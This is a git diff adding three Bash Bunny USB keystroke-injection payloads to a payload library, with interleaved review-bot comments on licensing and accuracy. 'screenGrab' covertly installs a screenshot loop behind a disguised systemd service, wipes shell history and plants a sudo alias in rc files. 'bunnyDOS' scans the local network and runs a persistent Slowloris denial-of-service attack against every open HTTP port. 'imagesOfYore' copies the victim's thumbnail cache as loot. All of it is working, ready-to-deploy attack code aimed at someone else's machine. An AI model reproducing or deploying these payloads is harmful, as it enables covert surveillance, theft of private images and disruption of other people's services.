diff --git a/payloads/library/execution/ScreenGrab/README.md b/payloads/library/execution/ScreenGrab/README.md
new file mode 100644
index 00000000..f3503171
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/README.md
@@ -0,0 +1,55 @@ +## About: +* Title: screenGrab +* Description: screenGrab payload captures snap shots of target's screen periodically and store them into bunny. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## screenGrab: screenGrab payload is divided into two modules, First capture snap shots and Second stores them in bunny. + +### Features: +* Robust Payload for capturing snap shots of target's screen. +* No additional dependencies required. +* Persistent. +* Autostart payload on boot. + +### Payload: +* Payload is divided into two modules: +1) Deployment: In this stage payload is deployed in targets system. +2) Exfiltration: Storing saved loot from targets system in bunny. + +### Payload Script's Workflow: +* Stop storing histroy. +* Grep bunny's mount point of bunny. +* Creating hidden directory in /var/tmp/..... for obfuscation. +* Copying ffmpeg and snap shot capturing mechanism in target's system. +* Creating systemd service for persistance and triggering mechanism for autostart. + +### Changes to be made: +* Change time interval of capturing snapshots, default time interval is 120 secs. Make changes in `systemBus` on line number `4`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Note: +* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in screenGrab directory. +* Due to big size of binary, it is not provided in this repo. +* Craete directory name `screenGrab` in `/loot/` for storing captured images. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| switch1/payload.txt | /payloads/switch1/ | +| switch2/payload.txt | /payloads/switch2/ | +| screenGrab/ | /payloads/libray/ | + +### Usage: +1. Deploy first payload during absence of target using `switch1`. +2. 
Execute second payload during absence of target to store captured snapshots in bunny using `switch2`. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh new file mode 100644 index 00000000..ea0ff7a6 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/screenGrab/ffmpeg /var/tmp/.system/ +chmod +x /var/tmp/.system/ffmpeg +mkdir /var/tmp/.system/sysLog +cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +cp -r $mntt/payloads/library/screenGrab/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/execution/ScreenGrab/screenGrab/shell b/payloads/library/execution/ScreenGrab/screenGrab/shell new file mode 100644 index 00000000..2b46e3d3 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/shell 
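Review bot: The script copies `ffmpeg` off the device, marks it executable and runs it from a systemd unit, but nothing establishes what binary that is, and the README tells users to fetch it from a personal GitHub release with no checksum or signature. Record the build's provenance (which ffmpeg version and build it is) and a SHA-256 in the README so a user can verify the download before placing it in the `screenGrab` directory, or reference a build source the ffmpeg project itself lists. The README's statement "No additional dependencies required" is also inaccurate for this script: besides the downloaded ffmpeg, the `systemBus` loop it installs calls `xdpyinfo` and relies on an X11 `$DISPLAY`, neither of which the README mentions.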
@@ -0,0 +1,12 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc +fi diff --git a/payloads/library/execution/ScreenGrab/screenGrab/systemBus b/payloads/library/execution/ScreenGrab/screenGrab/systemBus new file mode 100644 index 00000000..2f0c2b77 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/systemBus @@ -0,0 +1,5 @@ +while true; +do + /var/tmp/.system/./ffmpeg -f x11grab -video_size $(xdpyinfo | grep dimensions | cut -d" " -f7) -i $DISPLAY -vframes 1 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png + sleep 120 +done diff --git a/payloads/library/execution/ScreenGrab/switch1/payload.txt b/payloads/library/execution/ScreenGrab/switch1/payload.txt new file mode 100644 index 00000000..b8fafe1a --- /dev/null +++ b/payloads/library/execution/ScreenGrab/switch1/payload.txt 
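Review bot: The `sudo` alias appended to `~/.zshrc` and `~/.bashrc` points at `/var/tmp/.system/systemMgr`, which nothing in this commit creates or documents, so with the `&&` chain every `sudo` invocation by that user would appear to fail before the real `sudo` is reached. If that file belongs to a different payload, drop the two `alias` lines here; otherwise the README must list it as a component. Either way, the README's workflow section omits that this script modifies the user's shell rc files at all, and bunnyDOS/payload.sh makes the same kind of undocumented rc-file change.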
@@ -0,0 +1,56 @@ +# Title: screenGrab +# Description: screenGrab payload captures snap shot's of target's screen periodically. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 12000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/ScreenGrab/switch2/payload.txt b/payloads/library/execution/ScreenGrab/switch2/payload.txt new file mode 100644 index 00000000..06e59f37 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/switch2/payload.txt 
@@ -0,0 +1,43 @@ +# Title: screenGrab +# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +# create directory named screenGrab in /loot/ +Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER diff --git a/payloads/library/execution/bunnyDOS/README.md b/payloads/library/execution/bunnyDOS/README.md new file mode 100644 index 00000000..433d825e --- /dev/null +++ b/payloads/library/execution/bunnyDOS/README.md 
@@ -0,0 +1,37 @@ +## About: +* Title: bunnyDOS +* Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## bunnyDOS: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and DOS it. Inject payload into multiple systems in network for robust DDOS. + +### Features: +* Auto scan Network. +* Capable for DDOS. +* Persistent. +* Autostart payload on boot. + +### Payload Workflow: +* Stop storing histroy. +* Auto Mounting bunny. +* Transfering payload script. +* Executing script in background and disowning it(this helps to reduce physical access time as network can be large). +* Unmounting bunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| bunnyDOS/ | /payloads/libray/ | + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh new file mode 100644 index 00000000..eeb3f5f8 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh 
@@ -0,0 +1,19 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}') +open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }') +mkdir /var/tmp/.system/ +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/ +chmod +x /var/tmp/.system/systemIO +for i in $open +do + echo "/var/tmp/.system/./systemIO $i -p 80 -s 500" >> /var/tmp/.system/sysHandler +done +chmod +x /var/tmp/.system/sysHandler +systemctl --user start libSystemIO.service +echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm tmmmp && rm /tmp/payload.sh && exit diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO new file mode 100644 index 00000000..554a5035 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO 
@@ -0,0 +1,222 @@ +#!/usr/bin/env python3 +import argparse +import logging +import random +import socket +import sys +import time + +parser = argparse.ArgumentParser( + description="Slowloris, low bandwidth stress test tool for websites" +) +parser.add_argument("host", nargs="?", help="Host to perform stress test on") +parser.add_argument( + "-p", "--port", default=80, help="Port of webserver, usually 80", type=int +) +parser.add_argument( + "-s", + "--sockets", + default=150, + help="Number of sockets to use in the test", + type=int, +) +parser.add_argument( + "-v", + "--verbose", + dest="verbose", + action="store_true", + help="Increases logging", +) +parser.add_argument( + "-ua", + "--randuseragents", + dest="randuseragent", + action="store_true", + help="Randomizes user-agents with each request", +) +parser.add_argument( + "-x", + "--useproxy", + dest="useproxy", + action="store_true", + help="Use a SOCKS5 proxy for connecting", +) +parser.add_argument( + "--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host" +) +parser.add_argument( + "--proxy-port", default="8080", help="SOCKS5 proxy port", type=int +) +parser.add_argument( + "--https", + dest="https", + action="store_true", + help="Use HTTPS for the requests", +) +parser.add_argument( + "--sleeptime", + dest="sleeptime", + default=15, + type=int, + help="Time to sleep between each header sent.", +) +parser.set_defaults(verbose=False) +parser.set_defaults(randuseragent=False) +parser.set_defaults(useproxy=False) +parser.set_defaults(https=False) +args = parser.parse_args() + +if len(sys.argv) <= 1: + parser.print_help() + sys.exit(1) + +if not args.host: + print("Host required!") + parser.print_help() + sys.exit(1) + +if args.useproxy: + # Tries to import to external "socks" library + # and monkey patches socket.socket to connect over + # the proxy by default + try: + import socks + + socks.setdefaultproxy( + socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port + ) + socket.socket = 
socks.socksocket + logging.info("Using SOCKS5 proxy for connecting...") + except ImportError: + logging.error("Socks Proxy Library Not Available!") + +if args.verbose: + logging.basicConfig( + format="[%(asctime)s] %(message)s", + datefmt="%d-%m-%Y %H:%M:%S", + level=logging.DEBUG, + ) +else: + logging.basicConfig( + format="[%(asctime)s] %(message)s", + datefmt="%d-%m-%Y %H:%M:%S", + level=logging.INFO, + ) + + +def send_line(self, line): + line = f"{line}\r\n" + self.send(line.encode("utf-8")) + + +def send_header(self, name, value): + self.send_line(f"{name}: {value}") + + +if args.https: + logging.info("Importing ssl module") + import ssl + + setattr(ssl.SSLSocket, "send_line", send_line) + setattr(ssl.SSLSocket, "send_header", send_header) + +list_of_sockets = [] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 
Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +setattr(socket.socket, "send_line", send_line) +setattr(socket.socket, "send_header", send_header) + + +def init_socket(ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if args.https: + ctx = ssl.create_default_context() + s = ctx.wrap_socket(s, server_hostname=args.host) + + s.connect((ip, args.port)) + + s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1") + + ua = 
user_agents[0] + if args.randuseragent: + ua = random.choice(user_agents) + + s.send_header("User-Agent", ua) + s.send_header("Accept-language", "en-US,en,q=0.5") + return s + + +def main(): + ip = args.host + socket_count = args.sockets + logging.info("Attacking %s with %s sockets.", ip, socket_count) + + logging.info("Creating sockets...") + for _ in range(socket_count): + try: + logging.debug("Creating socket nr %s", _) + s = init_socket(ip) + except socket.error as e: + logging.debug(e) + break + list_of_sockets.append(s) + + while True: + try: + logging.info( + "Sending keep-alive headers... Socket count: %s", + len(list_of_sockets), + ) + for s in list(list_of_sockets): + try: + s.send_header("X-a", random.randint(1, 5000)) + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + logging.debug("Recreating socket...") + try: + s = init_socket(ip) + if s: + list_of_sockets.append(s) + except socket.error as e: + logging.debug(e) + break + logging.debug("Sleeping for %d seconds", args.sleeptime) + time.sleep(args.sleeptime) + + except (KeyboardInterrupt, SystemExit): + logging.info("Stopping Slowloris") + break + + +if __name__ == "__main__": + main() diff --git a/payloads/library/execution/bunnyDOS/payload.txt b/payloads/library/execution/bunnyDOS/payload.txt new file mode 100644 index 00000000..646fe1f0 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/payload.txt 
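Review bot: This file carries no attribution or license header, yet its argparse description (`Slowloris, low bandwidth stress test tool for websites`) and overall structure read as a vendored copy of an existing open-source tool rather than code written for this payload. If it is vendored, the upstream project's copyright and license notice must be preserved at the top of the file, and a comment naming the upstream source and the revision copied would let reviewers track fixes against it. A module docstring noting that `sysHandler` launches this tool unattended with fixed arguments would also help, since the argparse interface suggests interactive use.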
@@ -0,0 +1,51 @@ +# Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/bunnyDOS/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/imagesOfYore/README.md b/payloads/library/exfiltration/imagesOfYore/README.md new file mode 100644 index 00000000..f79725bf --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/README.md 
@@ -0,0 +1,38 @@
+## About:
+* Title: imagesOfYore
+* Description: imagesOfYore payload steals every image that target ever had in his disk.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltration
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage
+
+## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk.
+
+### Features:
+* Sotres all images(curently stored on disk and deleted too).
+* Extremly fast zstd compression for transfering images.
+
+### Payload Workflow:
+* Stop storing histroy.
+* Auto Mounting bunny.
+* Transfering payload script.
+* Executing script in background and disowning
+* Unmounting bunny.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| imagesOfYore/ | /payloads/libray/ |
+
+### Note:
+* Create directory named `imagesOfYore` in `/loot/` for storing loot.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh
new file mode 100644
index 00000000..e77f814c
--- /dev/null
+++ b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails
+udisksctl unmount -b /dev/$disk
+rm /tmp/script
diff --git a/payloads/library/exfiltration/imagesOfYore/payload.txt b/payloads/library/exfiltration/imagesOfYore/payload.txt
new file mode 100644
index 00000000..a1d2e914
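Review bot: The script archives only `~/.cache/thumbnails`, the freedesktop thumbnail cache written by file managers and image viewers, so the README's claim that it "steals every image that target ever had in his disk" overstates what is collected: the archive holds downscaled previews of images that were displayed at some point, not the original files. A header comment such as `# Archives ~/.cache/thumbnails (downscaled previews, not original images) to $mntt/loot/imagesOfYore/` would keep the script and the README consistent. The closing `rm /tmp/script` also assumes the caller copied the script to exactly that path, which only the accompanying payload.txt guarantees, and deserves a one-line comment.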
--- /dev/null
+++ b/payloads/library/exfiltration/imagesOfYore/payload.txt
@@ -0,0 +1,47 @@
+# Title: imagesOfYore
+# Description: imagesOfYore payload steals every image that target ever had in his disk.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script
+Q ENTER
+Q STRING chmod +x /tmp/script
+Q ENTER
+Q STRING /tmp/./script \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
+LED FINISH